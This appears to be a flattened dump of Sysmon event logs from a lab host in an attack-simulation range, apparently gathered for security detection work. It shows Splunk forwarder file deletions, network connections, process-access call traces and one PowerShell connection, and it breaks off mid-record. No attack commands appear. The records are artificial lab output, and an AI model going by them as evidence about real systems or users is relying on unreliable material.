23542300x800000000000000036498723Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:23:25.123{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=4E2E0F9DEA7EC411B6A13B643EE8F5C0,SHA256=463BBDBCC058CB3E839408118F34151F9BDBB5FF78432E35124EBAA29F81E896,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498722Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:23:25.123{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=4CD1B6D58666F2F50C0111432A65EBBE,SHA256=0DDFAC7884564DC3DD86FE4ABFE2970C3BB3DD53BD3FF87B066ADEC12BC14639,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036498726Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:23:55.946{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local50681-false10.0.1.12-8000- 23542300x800000000000000036498725Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:23:26.505{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=454090791F4F9A7EC154937537BE8CC0,SHA256=A1868624455EA7E36EBAE901D5CCC855A97178C2D632A7AE7B2AF9B3A99243FF,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 
23542300x800000000000000036498727Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:23:27.520{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=487028DECF8B00B8BDB67EEAD0511ECB,SHA256=02D049DFDC8DDC709B31223BF0E6E41EA019FEDA86616367A86579398FD73322,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498729Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:23:28.550{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=DD52FD3142CD06ACBD5E947084BAEBEA,SHA256=7F70685ACCD0F088D62A2DADB12C410A5C386CA3AB8E1B33CC7D5C3D721122D4,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498728Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:23:28.534{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2C3955920F4F722E633274121EEC4D81,SHA256=CBC8E63CCD6370B30D1B37BE3FF70168301EDE3A8AB9CA70D91FB6656F836B72,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498731Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:23:29.567{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9755E9B9184947520E3AE353EC5AC5C4,SHA256=A096FD764C4D342DFEDBC11AE76183485D02A1E5648DA1ADB26E26DE86DB4DF3,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036498730Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:23:59.227{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local50682-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000036498732Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:23:30.585{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=ADBD7232E177E724C3D458699AB6C090,SHA256=CBFECB65665383CC6E8810879204673807C21F1553AC40B10C95A63F83DAF1BC,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498738Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:23:31.665{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1C25D9217293128359CED53A8C57F6BF,SHA256=E4032FA8D573E735A14108FF8C2DD3CAF906ECC238E43374DD63CAA049B4F120,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000036498737Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:23:31.068{B81B27B7-5BF5-611D-6D04-00000000C801}50043344C:\Program Files\Mozilla 
Firefox\firefox.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\windows.storage.dll+141a47|C:\Windows\System32\windows.storage.dll+141373|C:\Windows\System32\windows.storage.dll+1411f9|C:\Windows\System32\windows.storage.dll+53731|C:\Windows\System32\windows.storage.dll+53679|C:\Windows\System32\windows.storage.dll+175f6|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+64ddc|C:\Windows\System32\combase.dll+64a92|C:\Windows\System32\combase.dll+633a8|C:\Windows\System32\combase.dll+6180f|C:\Windows\System32\combase.dll+6080f|C:\Windows\System32\combase.dll+5df06|C:\Windows\System32\combase.dll+5d6ba|C:\Windows\System32\user32.DLL+121e4|C:\Windows\System32\user32.DLL+11b2c 10341000x800000000000000036498736Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:23:31.068{B81B27B7-5BF5-611D-6D04-00000000C801}50043344C:\Program Files\Mozilla 
Firefox\firefox.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\windows.storage.dll+1419b2|C:\Windows\System32\windows.storage.dll+141373|C:\Windows\System32\windows.storage.dll+1411f9|C:\Windows\System32\windows.storage.dll+53731|C:\Windows\System32\windows.storage.dll+53679|C:\Windows\System32\windows.storage.dll+175f6|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+64ddc|C:\Windows\System32\combase.dll+64a92|C:\Windows\System32\combase.dll+633a8|C:\Windows\System32\combase.dll+6180f|C:\Windows\System32\combase.dll+6080f|C:\Windows\System32\combase.dll+5df06|C:\Windows\System32\combase.dll+5d6ba|C:\Windows\System32\user32.DLL+121e4|C:\Windows\System32\user32.DLL+11b2c 10341000x800000000000000036498735Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:23:31.068{B81B27B7-5BF5-611D-6D04-00000000C801}50043344C:\Program Files\Mozilla 
Firefox\firefox.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+141997|C:\Windows\System32\windows.storage.dll+141373|C:\Windows\System32\windows.storage.dll+1411f9|C:\Windows\System32\windows.storage.dll+53731|C:\Windows\System32\windows.storage.dll+53679|C:\Windows\System32\windows.storage.dll+175f6|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+64ddc|C:\Windows\System32\combase.dll+64a92|C:\Windows\System32\combase.dll+633a8|C:\Windows\System32\combase.dll+6180f|C:\Windows\System32\combase.dll+6080f 10341000x800000000000000036498734Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:23:31.068{B81B27B7-5BF5-611D-6D04-00000000C801}50043344C:\Program Files\Mozilla 
Firefox\firefox.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+141997|C:\Windows\System32\windows.storage.dll+141373|C:\Windows\System32\windows.storage.dll+1411f9|C:\Windows\System32\windows.storage.dll+53731|C:\Windows\System32\windows.storage.dll+53679|C:\Windows\System32\windows.storage.dll+175f6|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+64ddc|C:\Windows\System32\combase.dll+64a92|C:\Windows\System32\combase.dll+633a8|C:\Windows\System32\combase.dll+6180f|C:\Windows\System32\combase.dll+6080f|C:\Windows\System32\combase.dll+5df06 23542300x800000000000000036498733Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:23:31.068{B81B27B7-5BF5-611D-6D04-00000000C801}5004ATTACKRANGE\REED_SCHMIDTC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\reed_schmidt\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\6824f4a902c78fbd.customDestinations-ms~RF8a385874.TMPMD5=80D2028940892EB0B825AD2D8C8015CA,SHA256=4DD349D08FFD72024F455B053513402E406D7132CA573412DC85EEBC52CFD7A3,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498741Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:23:32.733{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0F33BF51CCBED0DD66AB66849882E334,SHA256=5D4C8F7D0B65F43E4AD0BC5497C309C9BCA0366F00E3BB8FF17BA0312861FCE7,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498740Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:23:32.686{B81B27B7-4013-611D-2700-00000000C801}2076NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=9D45E1BDB6F237A6CF51FFC6A12E6130,SHA256=87EEE278CDF62B2B86AF9CB87BDB04BAFB10272CEA175D83979B0C43158C5AB9,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036498739Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:24:01.792{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local50683-false10.0.1.12-8000- 354300x800000000000000036498743Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:24:04.355{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local50684-false10.0.1.12-8089- 23542300x800000000000000036498742Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:23:33.765{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=20B1666BB142F9B6615FBFD52F841978,SHA256=D7DF7E54C0A354F3C37198484F07F0B617E455CE9F69C1064BFC39348FC1A5D7,IMPHASH=00000000000000000000000000000000falsefalse - insufficient 
disk space 354300x800000000000000036498746Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:24:05.240{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local50685-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000036498745Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:23:34.768{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9E10710FAB8B3A01A41E3883AC3B80D7,SHA256=74758F5500C77CCC0C06A13424AF7A9F74C52DD9FE2BFBFE9B97182C267EA01C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498744Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:23:34.566{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=BA1CE851F9FE817C3182CE134E5E7839,SHA256=6A6422C2A2E3C91A1135656ECCE1676EACED7E4765D8495A067D302A319EF55C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498747Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:23:35.814{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=45347355B748E243BA48F0D52B1271D1,SHA256=9F12AA1BE194C20B9F134B354CF277994B647D31BF27D6F3C5ABD0D38AD6A70E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498748Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:23:36.844{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0DB2882B5A155D9C8FC729A272C921F7,SHA256=145281B2A2B8A9593C825D2BC7E7F8B557241C9FC66905829932D91DAC2CC0E4,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000036498758Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:23:37.964{B81B27B7-A259-6140-B756-04000000C801}55645776C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000036498757Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:23:37.862{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D13A2CF6201C51B1D076FEFC69A4FDEC,SHA256=4BEDEA38D11C8B03053EFAAF52C1EDBCF05D80C667F41E214352B3C3000EF74C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000036498756Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:23:37.811{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-A259-6140-B756-04000000C801}5564C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498755Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:23:37.811{B81B27B7-4012-611D-0C00-00000000C801}7326156C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498754Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 
13:23:37.811{B81B27B7-4012-611D-0C00-00000000C801}7326156C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498753Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:23:37.811{B81B27B7-4012-611D-0C00-00000000C801}7326156C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498752Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 
13:23:37.811{B81B27B7-4012-611D-0C00-00000000C801}7326156C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498751Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:23:37.811{B81B27B7-4012-611D-0500-00000000C801}420984C:\Windows\system32\csrss.exe{B81B27B7-A259-6140-B756-04000000C801}5564C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000036498750Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:23:37.811{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-A259-6140-B756-04000000C801}5564C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000036498749Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:23:37.797{B81B27B7-A259-6140-B756-04000000C801}5564C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000036498771Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:23:38.879{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A07DFA0518452DD1AC809C72C5A2E829,SHA256=352B63F6E676F7A319CC8E7841A7F06FE59F953F001D0E53EAB11D4723157DD3,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498770Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 
13:23:38.810{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=66F27AB358D14158904424E15ACBA716,SHA256=30682067DC2A33550E52BB9D177B8CB2776612DCC7999E031AFA2F669FCCC102,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498769Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:23:38.810{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=4E2E0F9DEA7EC411B6A13B643EE8F5C0,SHA256=463BBDBCC058CB3E839408118F34151F9BDBB5FF78432E35124EBAA29F81E896,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000036498768Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:23:38.664{B81B27B7-A25A-6140-B856-04000000C801}6081380C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program 